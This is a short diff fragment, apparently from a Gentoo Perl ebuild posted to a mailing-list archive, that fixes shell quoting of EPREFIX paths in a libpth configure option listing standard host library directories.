1454 # Use all host paths that might contain useful stuff, the hook above will filter out bad choices.
1455 local paths="/lib/*-linux-gnu /usr/lib/*-linux-gnu /lib64 /lib/64 /usr/lib64 /usr/lib/64 /lib32 /usr/lib32 /lib /usr/lib"
1456 - myconf "-Dlibpth="${EPREFIX}"/$(get_libdir) "${EPREFIX}"/usr/$(get_libdir) ${paths}"
1457 + myconf "-Dlibpth=${EPREFIX}/$(get_libdir) ${EPREFIX}/usr/$(get_libdir) ${paths}"
1458 elif [[ $(get_libdir) != "lib" ]] ; then
1459 # We need to use " and not ', as the written config.sh use ' ...
1460 myconf "-Dlibpth=/usr/local/$(get_libdir) /$(get_libdir) /usr/$(get_libdir)"
Report Message
Find on MARC Find on Google Groups